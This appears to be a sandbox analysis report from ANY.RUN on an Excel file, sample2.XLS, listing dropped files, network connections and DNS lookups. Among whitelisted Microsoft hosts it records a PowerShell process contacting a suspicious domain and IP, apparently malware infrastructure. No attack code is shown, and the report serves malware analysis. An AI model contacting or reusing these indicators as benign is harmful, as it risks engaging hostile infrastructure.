3584EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF43045BA7075E7D88.TMP
MD5:
SHA256:
3584EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFFB82929A953C79CB.TMP
MD5:
SHA256:
3584EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm
MD5:
SHA256:
3584EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
10
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D
US
der
1.47 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
3584
EXCEL.EXE
13.107.3.128:443
config.edge.skype.com
Microsoft Corporation
US
whitelisted
40.90.23.213:443
login.live.com
Microsoft Corporation
US
unknown
3584
EXCEL.EXE
52.109.124.20:443
nexusrules.officeapps.live.com
Microsoft Corporation
SG
whitelisted
3584
EXCEL.EXE
52.114.88.20:443
self.events.data.microsoft.com
Microsoft Corporation
GB
whitelisted
3584
EXCEL.EXE
52.109.32.27:443
officeclient.microsoft.com
Microsoft Corporation
GB
whitelisted
300
powErsHell.exe
185.158.249.75:443
woeiuyfgowe.xyz
easystores GmbH
NL
suspicious

DNS requests

Domain
IP
Reputation
login.live.com
  • 40.90.23.213
whitelisted
self.events.data.microsoft.com
  • 52.114.88.20
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted
config.edge.skype.com
  • 13.107.3.128
whitelisted
woeiuyfgowe.xyz
  • 185.158.249.75
suspicious
nexusrules.officeapps.live.com
  • 52.109.124.20
whitelisted
officeclient.microsoft.com
  • 52.109.32.27
whitelisted

Threats

No threats detected
Process
Message
EXCEL.EXE
2019-07-17 08:12:23.854 T#1992 <E> [AriaSDK.PAL] PAL is already shutdown!
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
sample2.XLS